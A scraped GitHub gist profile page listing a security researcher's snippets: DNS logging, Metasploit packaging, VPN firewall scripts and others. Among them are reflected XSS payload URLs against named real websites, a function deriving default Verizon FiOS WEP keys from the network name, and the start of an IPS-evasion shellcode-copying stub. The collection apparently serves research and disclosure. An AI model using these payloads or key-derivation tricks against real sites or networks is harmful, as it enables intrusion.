Skip to content

Instantly share code, notes, and snippets.

Gerry Eisenhaur gerry

Block or report user

Report or block gerry

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View keybase.md

Keybase proof

I hereby claim:

  • I am gerry on github.
  • I am gerry (https://keybase.io/gerry) on keybase.
  • I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF

To claim this, I am signing this object:

@gerry
gerry / dns_logger.py
Created Apr 29, 2015
Respond to and record dns lookups.
View dns_logger.py
#!/usr/bin/env python
import sys
import random
import string
import datetime
import itertools
import threading
import traceback
import SocketServer
import operator as op
View fios-wep.py
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
# address of the router (1801 or 1F90)
def get_key(essid):
key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
return hex(key)
# >>> print get_key("E3X12")
# 0x349fca
@gerry
gerry / htl_extract.py
Last active Sep 24, 2015
Extracts the embedded source code from Cisco Security Agent Management Console.
View htl_extract.py
#!/usr/bin/env python
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <gerry@hiredhacker.com>
"""
import os
import sys
import struct
import pefile
from itertools import takewhile
@gerry
gerry / XSS Dump
Created Jan 5, 2011
Collection of random web bugs (mainly XSS)
View XSS Dump
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//
@gerry
gerry / msf-rex.gemspec
Created Nov 8, 2011 — forked from emonti/msf-rex.gemspec
gemspec to get a ruby gem out of lib/rex in the metasploit framework
View msf-rex.gemspec
# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
#
# Create gem with:
# $ gem build msf-rex.gemspec
#
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
# We can still "require 'rex'" though.
$: << 'lib'
@gerry
gerry / import_nessus_nbe.diff
Created Feb 27, 2013
Quick fix for importing Nessus NBE files
View import_nessus_nbe.diff
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
# There is no place the NBE actually stores the plugin name used to
# scan. You get "Security Note" or "Security Warning," and that's it.
def import_nessus_nbe(args={}, &block)
- data = args[:data]
+ nbe_data = args[:data]
View update-pia-hosts.sh
#!/bin/sh -e
HOSTNAME=us-california.privateinternetaccess.com
# host us-california.privateinternetaccess.com|cut -d' ' -f4|tr \\n ,
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
IP=$(echo $HOST_IPS | tr , \\n | shuf - | head -n 1)
if grep -q $HOSTNAME /etc/hosts; then
sed -i "s/.*$HOSTNAME/$IP $HOSTNAME/" /etc/hosts
else
echo $IP $HOSTNAME >> /etc/hosts
View kill-switch.sh
#!/bin/sh -e
DEFAULT_IFACE=enp0s3
LOCAL_NET=$(ip -o -f inet addr show $DEFAULT_IFACE | awk '{print $4}')
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
ufw --force reset
ufw default deny outgoing
ufw default deny incoming
ufw allow out on tun0 from any to any
ufw allow in on tun0 from any to any
@gerry
gerry / evasions.py
Created Apr 18, 2010
collection of various IPS evasions
View evasions.py
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
You can’t perform that action at this time.